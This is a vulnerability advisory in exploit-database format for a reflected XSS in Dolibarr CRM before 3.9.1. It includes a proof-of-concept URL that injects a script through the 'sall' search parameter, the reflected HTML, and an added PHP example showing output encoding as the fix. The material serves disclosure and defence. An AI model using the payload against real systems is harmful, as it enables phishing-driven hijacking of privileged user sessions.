# Exploit Title: Dolibarr CRM < 3.9.1 - Reflective XSS Vulnerability
# Exploit Author: David Silveiro 
# Exploit Author Github: github.com/davidsilveiro
# Exploit Author Twitter: twitter.com/david_silveiro 
# Vendor Homepage: https://www.dolibarr.org
# Software Link: https://sourceforge.net/projects/dolibarr/files/
# Date: Zero Day


Dolibarr ERP is a modern CRM to manage your company. It's open-source software,
designed for small and medium companies, foundations and freelancers.

The issue lies in insufficient sanitization of input to the provided search
function: the search term is reflected into the results page, so an attacker can
inject malicious JS to be used hand in hand with a phishing attack directed
at a higher-privileged user.

POC:

http://127.0.0.1/societe/list.php?sall=<script>alert()<%2Fscript>

    <form name="formfilter" action="/societe/list.php" method="post">
        <input type="hidden" value="4a7a89e8a1f2f1fa55a6420ecb115954" name="token"></input>
        <input id="formfilteraction" type="hidden" value="list" name="formfilteraction"></input>
        <input type="hidden" value="s.nom" name="sortfield"></input>
        <input type="hidden" value="ASC" name="sortorder"></input>

        Search criteria '

        <strong>
            <script>

                alert() <-------

            </script>
        </strong>

        ' into fields Third party name, Alias name, Custom?

        <table class="liste "></table>
    </form>
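
The reflected output above, reduced to the vulnerable pattern beside a hardened form. This is an added example, not Dolibarr source code and not part of the original advisory; the function names and the banner text layout are assumptions made for illustration, and the input is the `sall` value from the POC URL.

```php
<?php
// Added illustration; not Dolibarr source. Function names are hypothetical.

// Vulnerable pattern: the search term is concatenated into the HTML body as-is,
// so any markup in it becomes part of the page.
function render_search_banner_unsafe(string $sall): string
{
    return "Search criteria '<strong>" . $sall . "</strong>' into fields Third party name, Alias name";
}

// Hardened pattern: encode for the HTML context at the point of output.
// ENT_QUOTES also covers the case where the value lands in an attribute;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function render_search_banner_safe(string $sall): string
{
    $encoded = htmlspecialchars($sall, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "Search criteria '<strong>" . $encoded . "</strong>' into fields Third party name, Alias name";
}

// Constructed input: the sall parameter from the POC URL, URL-decoded as the
// web server would hand it to the application.
$sall = urldecode('<script>alert()<%2Fscript>');

$unsafe = render_search_banner_unsafe($sall);
$safe   = render_search_banner_safe($sall);

// Check whether a live <script> element survives in each rendering.
var_dump(strpos($unsafe, '<script>') !== false);
var_dump(strpos($safe, '<script>') !== false);

// The encoded banner, as it would be sent to the browser.
echo $safe, PHP_EOL;
```

Encoding belongs at output time, in the function that builds the HTML, so the stored or searched value itself stays unmodified.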